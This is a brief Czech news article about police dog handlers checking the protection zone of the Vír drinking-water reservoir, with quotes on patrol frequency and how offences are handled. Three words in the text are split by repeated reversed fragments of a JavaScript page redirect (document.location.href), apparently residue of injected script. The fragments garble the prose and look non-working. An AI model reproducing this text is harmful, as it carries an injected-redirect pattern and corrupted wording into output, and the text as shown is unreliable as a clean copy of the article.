Rainbow page separator

Policejní psovodi provádějí kontroly v okolí přehrady ve Víru

Sobota, 18. srpna 2018

Vír / Dodržování zákazu koupání, rybolovu, přístupu k vodě i dalších činností zapovězených v prvním pásmu hygienické ochrany prováděli policejní kynologové u přehrady ve Víru, jež slouží jako rezervoár pitné vody pro velkou část žďárského okresu i Brno.
„Kontroly provádíme nepravidelně, během celého roku a v denní i noční dobu,“ uvedl Lukáš Čejka, vrchní asistent oddělení služební kynologie skupiny základních kynologických činností ve Žďáře nad Sázavou. Psovodi obcházejí břehy přehrady a kontrolují, zda se v místech ochranného pásma nenacházejí osoby, které by porušovaly zákaz vstupu. Právě v létě jsou ty[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to kontroly častější. V rámci jedné obchůzky psovodi zkontrolují přibližně dvanáctikilometrový úsek.
„V případě, že policejní psovod přestupce odhalí, vyřídí daný přestupek podle jeho závažnosti, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to buď na místě domluvou, anebo si vyžádá součinnost policistů z obvodního oddělení v Bystřici nad Pernštejnem. Bystřičtí policisté pak přestupek vyřeší v příkazním řízení na místě uložením pokuty, nebo věc zadokumentují a pos[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toupí k projednání příslušnému správnímu orgánu,“ upřesnila postup policejní mluvčí Stanislava Miláčková.